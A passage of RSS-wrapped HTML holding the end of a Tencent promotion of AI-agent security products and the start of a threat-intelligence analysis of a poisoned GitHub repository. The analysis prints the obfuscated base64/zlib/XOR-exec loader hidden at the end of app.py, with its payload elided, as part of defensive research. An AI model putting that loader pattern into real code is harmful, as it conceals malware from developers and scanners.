0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p data-line="362" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">本地个人：</span></strong></p><blockquote style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1em 0px;padding: 1em 1em 1em 2em;outline: 0px;border-left: 4px solid rgb(0, 82, 217);color: rgba(0, 0, 0, 0.6);font-size: 15px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: italic;border-radius: 0px 6px 6px 0px;background: rgb(247, 247, 247);box-shadow: none;"><p data-line="363" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">腾讯电脑管家 </span>18.0 版本提供「龙虾管家-AI安全沙箱」，无需复杂配置、一键即可为 “龙虾” 开启隔离运行环境，并通过AI实时运行保护和漏洞防护，实现 “龙虾” 的全流程防护。</span></span></p></blockquote><p data-line="365" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">本地企业：</span></strong></p><blockquote style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1em 0px;padding: 1em 1em 1em 2em;outline: 0px;border-left: 4px solid rgb(0, 82, 217);color: rgba(0, 0, 0, 0.6);font-size: 15px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: italic;border-radius: 0px 6px 6px 0px;background: rgb(247, 247, 247);box-shadow: none;"><p data-line="366" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">腾讯iOA</span>提供 “威胁源头——执行过程——数据出口” 全链路龙虾防护</span></span></p></blockquote><p data-line="368" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">云端部署</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：</span></p><blockquote style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1em 0px;padding: 1em 1em 1em 2em;outline: 0px;border-left: 4px solid rgb(0, 82, 217);color: rgba(0, 0, 0, 0.6);font-size: 15px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: italic;border-radius: 0px 6px 6px 0px;background: rgb(247, 247, 247);box-shadow: none;"><p data-line="369" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">Lighthouse原生安全</span> Lighthouse与腾讯云ClawPro自带云端物理防爆箱：环境隔离、最小化端口放行、一键快照回滚</span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">AI Agent安全中心</span> 盘点AI Agent资产，管控Agent行为，防范skills风险，保护密钥凭据，深度审计和全链路溯源</span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">AI Agent安全网关</span> AI Agent身份凭据安全，防提示词注入，内容安全，数据防泄露，Token限流</span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">Agent Runtime</span> 提供VM级强隔离、网络隔离、文件隔离、零凭证访问等能力，支持数十万实例并发</span></span></p></blockquote><p data-line="373" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Skills安全</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：</span></p><blockquote style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1em 0px;padding: 1em 1em 1em 2em;outline: 0px;border-left: 4px solid rgb(0, 82, 217);color: rgba(0, 0, 0, 0.6);font-size: 15px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: italic;border-radius: 0px 6px 6px 0px;background: rgb(247, 247, 247);box-shadow: none;"><p data-line="374" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">EdgeOne ClawScan</span> 一句话即可让龙虾自己安装，自动 “体检” 并输出报告 </span></span></p><p data-line="374" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">HaS Anonymizer</span> 隐私保护，支持文本 / 图片信息扫描、脱敏和还原 </span></span></span></p><p data-line="374" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-style: normal;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span textstyle="" style="font-weight: bold;">威胁情报中心</span> Skills安全检测，构建覆盖互联网威胁发现与未知样本检测的全方面防护能力</span></span></span></span></p></blockquote></div><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: center;"><img alt="图片" class="rich_pages wxw-img" data-aistatus="1" data-backh="1138" data-backw="578" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/jHUbrwW0VwXSDrAQ3X6hgsw21icuuHGxLUTLwndXSXq2kpRVD6ibxkiczLtDPcLgbMzDAibaicKCTeNDiaYokUAiaSVyLOKLtothElVXqC8942icfpA/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="578" data-cropsely2="1138" data-imgfileid="100027838" data-ratio="1.9685185185185186" data-s="300,640" data-type="jpeg" data-w="1080" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;vertical-align: bottom;box-sizing: border-box !important;overflow-wrap: break-word !important;width: 677px !important;visibility: visible !important;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9f124a34&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXSDrAQ3X6hgsw21icuuHGxLUTLwndXSXq2kpRVD6ibxkiczLtDPcLgbMzDAibaicKCTeNDiaYokUAiaSVyLOKLtothElVXqC8942icfpA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D5%26wx_lazy%3D1%23imgIndex%3D5"/></p><div class="wx-theme" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px 0px 24px;padding: 20px 16px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;letter-spacing: normal;text-align: start;background-color: rgb(255, 255, 255);font-size: 16px;line-height: 1.6;"><p data-line="380" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px 8px 1.5em;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b3eb19d7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511501%26idx%3D1%26sn%3Ddee1f9ede8c0605190a859354bb8cbdd">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 26 Mar 2026 20:25:00 +0800</pubDate>
    </item>
    <item>
      <title>寄生克隆 | 当 AI 助手成为蠕虫的传播加速器：Vibe Coding 时代的供应链危机</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511496&amp;idx=1&amp;sn=62f573b1b87cbe92708cebbc20891236</link>
      <description>这是一起利用AI编程信任链的供应链投毒攻击。攻击者通过污染开源仓库，植入含区块链C2、地理围栏的高级后门，系统窃取开发者数字资产与供应链凭证，影响广泛。</description>
      <content:encoded><![CDATA[<p>原创 <span>腾讯安全威胁情报</span> <span>2026-03-25 18:53</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=bce98a6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXfUR23IibcXT6mtfDsRy40NPVr8kgg8ibgmvDmSdUFMqAG0MmKgVR1sRdbAgX4H7hhmnpdKXSbiaK8EWqoGhk29LvqNxOzu8gR90%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>这是一起利用AI编程信任链的供应链投毒攻击。攻击者通过污染开源仓库，植入含区块链C2、地理围栏的高级后门，系统窃取开发者数字资产与供应链凭证，影响广泛。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><p data-line="0" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">腾讯安全科恩实验室威胁情报团队近期在日常运营发现一个高度可疑的开源仓库：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">github.com/zypsvl/tahmin-uygulamasi</span></code><span leaf="">。 </span></p><p data-line="0" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">这原本是一个再正常不过的 Streamlit 数据分析项目。有着中规中矩的 README、符合逻辑的代码结构和正常的提交历史。项目的原作者也是一位普通的开发者——在毫不知情的情况下，他的代码仓库已经成为了攻击者的武器。 </span></p><p data-line="0" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">这起事件发生在一个特殊的时代背景下：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Vibe Coding 热潮的全面爆发。</span></strong><span leaf=""> 随着 Claude Code、Cursor、GitHub Copilot 成为标配，开发者编写代码的姿势正在发生不可逆的迁移。“让 AI 帮我写，让 AI 帮我跑”不仅极大提升了效率，也导致开发者对代码的“人工审查意愿断崖式下降。</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AI 工具，正在不经意间成为开发者与恶意代码之间危险的“信任中介”。</span></strong></p><p data-line="0" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">这并非一个孤立的事件。顺着这个看似正常的仓库向下深挖，我们发现这仅仅是一场针对现代开发者、有组织且极具破坏性的多阶段供应链投毒行动的冰山一角。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="7" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">1. 第一层伪装：藏在正常代码尾部的混淆代码</span></h2><p data-line="9" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">首次打开受感染项目的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">app.py</span></code><span leaf="">，你很难在第一时间察觉到异样。</span></p><p data-line="9" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf=""> 文件的前 94 行是完全正常的 Python Streamlit 框架代码。逻辑清晰，注释合理，任何一个开发者，哪怕是 AI 助手在进行上下文分析时，都会认为这只是一个普通的应用脚本。 </span></p><p data-line="9" style="margin: 0px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">然而，从第 95 行开始，画风突变——一段任何人都不会主动去阅读的超长 Base64 字符串，安静地蛰伏在文件末尾。</span></p><figure data-line="13" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5268518518518519" data-s="300,640" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwX4U99fibayiceI2X6tL53D6YiaqCKlY8HjHHBTx1GpFaicnrcibBlskxK9ra4eMHATuz2LtvebIOjiaSAFQLNic0JoBprrfO0ZCVRiblw/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="279" data-imgfileid="100027814" src="https://wechat2rss.xlab.app/img-proxy/?k=d5c918b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwX4U99fibayiceI2X6tL53D6YiaqCKlY8HjHHBTx1GpFaicnrcibBlskxK9ra4eMHATuz2LtvebIOjiaSAFQLNic0JoBprrfO0ZCVRiblw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">恶意python脚本</span></figcaption></figure><p data-line="16" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在传统的开发模式下，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git diff</span></code><span leaf=""> 或者人工 Code Review 也许能捕捉到文件末尾的异常追加。但在 Vibe Coding 的场景中，开发者往往通过 AI 助手的终端提示直接执行 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git pull</span></code><span leaf=""> 拉取代码并运行。AI 模型由于上下文限制，一般不会主动阅读全文并跳出来警告你：“嘿，这个文件的作者提交时间和 Committer 提交时间存在巨大的差异，且末尾有一段乱码。”</span></p><p data-line="18" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在“AI 说没问题就可以跑”的心理惯性下，这段毒代码就这样大摇大摆地进入了开发者的执行环境。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># -*- coding: utf-8 -*-</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">aqgqzxkfjzbdnhz = </span><span style="color: rgb(0, 72, 171);"><span leaf="">__import__</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;base64&#39;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">wogyjaaijwqbpxe = </span><span style="color: rgb(0, 72, 171);"><span leaf="">__import__</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;zlib&#39;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">idzextbcjbgkdih = </span><span style="color: rgb(76, 129, 201);"><span leaf="">134</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">qyrrhmmwrhaknyf = </span><span style="color: rgb(0, 72, 171);"><span leaf="">lambda</span></span><span leaf=""> dfhulxliqohxamy, osatiehltgdbqxk: </span><span style="color: rgb(0, 72, 171);"><span leaf="">bytes</span></span><span leaf="">([wtqiceobrebqsxl ^ idzextbcjbgkdih </span><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> wtqiceobrebqsxl </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> dfhulxliqohxamy])</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">lzcdrtfxyqiplpd = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;eNq9W1...[Base64_String]...&#39;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">runzmcxgusiurqv = wogyjaaijwqbpxe.decompress(aqgqzxkfjzbdnhz.b64decode(lzcdrtfxyqiplpd))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">ycqljtcxxkyiplo = qyrrhmmwrhaknyf(runzmcxgusiurqv, idzextbcjbgkdih)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">exec</span></span><span leaf="">(</span><span style="color: rgb(0, 72, 171);"><span leaf="">compile</span></span><span leaf="">(ycqljtcxxkyiplo, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;&lt;&gt;&#39;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#39;exec&#39;</span></span><span leaf="">))</span></p></code></pre></div><p data-line="32" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了防止被安全软件静态查杀，攻击者在这里构建了三层嵌套混淆，每一层都是一道防分析的门：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第一层 Base64</span></strong><span leaf="">：将恶意代码伪装成普通的文本“数据”，绕过基于已知恶意关键字的静态扫描。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第二层 zlib 压缩</span></strong><span leaf="">：进一步破坏代码的结构特征，降低信息熵，规避基于字符串匹配和熵值检测的杀毒引擎。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第三层 XOR 134</span></strong><span leaf="">：动态还原逻辑。密钥 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 